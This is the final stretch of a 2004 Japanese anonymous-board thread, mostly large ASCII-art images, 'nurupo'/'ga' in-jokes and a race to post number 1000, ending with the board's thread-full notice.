  / ノ          ヽ、   ./ ノ;;;;;;;;;::, -'"   _/
  (_/ )          / / };;:::::::::......  _,,; イ
  / ,.-〈    ヒー---ァ'  /、  ゙入ェ;-;-;''==ソ
 (/ __)\    ̄ ̄   /   フ>、{::::::..      {      そろそろ1000…
 (_,ィ'" )  > 、_   /    // /\;;;;;;;;;____,,,ィ'
  / ,ィ'  / }   ̄     // ノ   Y:;  ノ
 'ー'イ    /        // ./    };;;;'' イ
   |\  /        //  /    /ヽ;: {

987 :[名無し]さん(bin+cue).rar:04/08/24 20:39 ID:rpLPrqrJ
l  i ! | i  | |l'、ト ヽ iヽ ヽ  ',
 |  / | |. i  |.|| i.|ヽ |、 | ',   i  i
 ! / |,ャ、メ |i ト十i‐トi、! l  .i|  i
,.|!,.+‐'"| | | |i}  ' ュノェ|i,`i  l.| i
l |/;:=ニ|i  l |   /rj:ヽ\ i  l i l  私より1000ゲットの方が大切ですか?
' '/ iニ)ヽ,ヽ |!.   ' {::::::;、! 〉iー | | |
;〈 !:::::::c!      `'ー''(つ }i | i.| |
 (つ`''"    、  //// /;:i | | !. |
、////      '     /,ノi,   i. |
、,ゝ、     , ‐-    /   i |  |. i     
 | lヽ、        /    | i  | !
i |l l| |`''‐、_   , イ | |    | i  |. !
| ||i,| |   ` ''"  | /l| l  |i  |l l  ! i
| l|!,>‐!          |〃i:|'i i | |.i |i | |i
i l iヽ.,!        |メ,/ | /ノi i. ! il i |i
/' |.:.:.:.``''ー-、     !  ,|/ |/i' l |i l |ヽ



988 :[名無し]さん(bin+cue).rar:04/08/24 21:20 ID:t7cUohz/
                | ̄``''- 、
                |      `゙''ー- 、  ________
                |    ,. -‐ ''´ ̄ ̄`ヽ、_        /
                |, - '´ ̄              `ヽ、     /
              /               `ヽ、ヽ   /
             _/                    ヽヽ/
           / / /   /  /  /            ヽハ
          く  / /!   |   〃 _/__ l|   | |   |  |  | | ||ヽ
           \l// / |  /|'´ ∧  ||   | |ー、||  |  | l | ヽ
            /ハ/ |  | ヽ/ ヽ | ヽ  | || /|ヽ/!  |/ | ヽ
            / |  ||ヽ { ,r===、   \| _!V |// //  .!   |
            | ||   |l |ヽ!'´ ̄`゙   ,  ==ミ、 /イ川  |─┘
            | ハ||  || | """ ┌---┐  `  / //  |
            V !ヽ ト! ヽ、    |     !    / //| /
               ヽ! \ハ` 、 ヽ、__ノ    ,.イ/ // | /
    ┌/)/)/)/)/)/)/)/)/)/)lー/ ` ー‐┬ '´ レ//l/ |/
    |(/(/(/(/(/(/(/(/(/(/│||      | \  〃
  r'´ ̄ヽ            | |.ト     /  \
  /  ̄`ア  ぬ  る  ぽ  | | |  ⌒/     入
  〉  ̄二)            | | |  /     // ヽ
 〈!   ,. -'            | | ヽ∠-----', '´    ',
  | \| |             | |<二Z二 ̄  /     ',
  |   | |             _r'---|  [ ``ヽ、      ',
  |   | |             >-、__    [    ヽ      !
  \.| l.              ヽ、      [     ヽ    |
    ヽ|              \    r'       ヽ、    |



989 :[名無し]さん(bin+cue).rar:04/08/24 21:22 ID:2gAozhIo
              ____
              | G  A  |
              |____|
                 .||
      N、、_     _,/'  ||
      |ヽ''~ ̄ ̄ ̄~`ヾ  ||
     /_,,,..   ..,,,_.`u_'`、
    /:  ━     ━  | ニ_}  
    |::    ∈∋    ヽ  l  はいはい私がガッの神様ですよw
  //::    -=,=.ヮ.     lヽ、|  
  /'../::    /∠.._     |、.ノ  
 /':::|:::      ̄ ̄      |./
 !-'p|::.             v'
.   ヾ:::..           /
.    , ゞ、、;;;,,_,,,..._;;;;;__,,..ノ、
    'ー┐,,..、_ ノ  lo,,,...、 _,,一`


990 :[名無し]さん(bin+cue).rar:04/08/24 21:37 ID:bXKggBVk
               ,  ,.. ‐、' ´ ̄、 ー-- -イ_
              /<´   ヽ´  ヽ      `丶
               /   >    丶 _, >       ヽ\
            , '   /  丶    〈           ヽ
          /    丶  ,. ヘ    〉            ',
           /      `'´  ヽr''´      ト. ト. i     i
         '    /        ト.   ー--Hi-H- l    |l
          i   /  ,   l  ,レl´!|    ,|,! / リ l |i |  |  ,l!
         l.  ,'  i ___,,iレ'´l|. l }!/  //レ /|,! リ !  ,! /
          !  i   |  i !| /! l' /イ / 弋フ~厂/' /'/
          l | i|!.  ! l.!_レっ´厂 ´    `¨, , 'イ、イ'′もう990だよお〜
           ll |lハ  ', l|^ー-‐'            jィl
     , -、    | !| ヽ.r‐v  ' '      r―1      / .|l
      {   ',   |l |  .{´(ゝ_       l.  j   ,.イ! ‖
.      ',   '、   |. |  l lー‐‐ .__    ヽ_'_,. ィl  l!.  |
     ヽ  ヽ _ .l |   !ハ   ヽl 、}` ̄ ̄ | l! l|  |  |
     ,rヘ  / .}l! | 〃|.ヽ   ヽヽ      !_l! l|  |.   l
      j  ヽj  {\ ! /,r''´:.l ヽ.  ', iー---‐'' >―‐- 、 !
    r' \ `i. `‐ヽく:...:...:...! ',  i l` ̄ ̄'´:...:...:...:...:...:.ヽl
    ノ 、  ヽ l`  }:...ヽ:...:..|i i  | |:...:...:...:...:...:...:...:...:...:.....'l


991 :[名無し]さん(bin+cue).rar:04/08/24 21:47 ID:ZfAXAY2I

      ,. -─ '' "⌒'' ー- 、           __,,. -──- 、.
    ./ ,r' ´  ̄ ̄ `'' ‐-r--、     r=ニフ´  ̄ ̄ ~`` ‐、 \
   /      ,r--‐''‐ 、.._,,二フ-、  ,. -‐゙ー-‐ ''、'ー--''-_、     \
 /       /     , '´    ,.イ ヽ__     }ノ´二 -‐ヽ._    \
        {       i     >{    L    ,'ー 'ー ''´ ̄}
         ト、     !.     〈/     }   /      ,.イ
         ヽ、___ヽ、  ./ カパッ   ̄レ'   _, ‐'
  、             " `,二ヽ!        r''二  ̄
    ` ‐- 、..__,. -‐─┴─'         ゙─‐'--''─- 、..___ ,.
                    ‖‖
                    ‖‖

                 /\___/ヽ
                /''''''991'''''':::::::\
               . |(●),   、(●)、.:| +
               |   ,,ノ(、_, )ヽ、,, .::::|    
             .   |   `-=ニ=- ' .:::::::| +
                \  `ニニ´  .:::::/     +


992 :[名無し]さん(bin+cue).rar:04/08/24 21:50 ID:1RphJJvN
>>984
コミック用しか無い見たいだけど、ゲーム用も有るの?

993 :[名無し]さん(bin+cue).rar:04/08/24 21:51 ID:1RphJJvN
>>992
ついでに1000取り合戦用に上げてしまおう

994 :[名無し]さん(bin+cue).rar:04/08/24 21:52 ID:1RphJJvN
みんな、がんがれ
俺は、さっさと撤退する

995 :[名無し]さん(bin+cue).rar:04/08/24 21:52 ID:lMXSYQ/9
さて勉強するか

996 :[名無し]さん(bin+cue).rar:04/08/24 21:52 ID:1RphJJvN
でわ

997 :[名無し]さん(bin+cue).rar:04/08/24 21:53 ID:W8swHrCh
ぬるぽ

998 :[名無し]さん(bin+cue).rar:04/08/24 21:53 ID:GJp+MmJY
ガッ

999 :[名無し]さん(bin+cue).rar:04/08/24 21:54 ID:HqvuRPA4
1000


1000 :[名無し]さん(bin+cue).rar:04/08/24 21:54 ID:GJp+MmJY
1000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

269 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)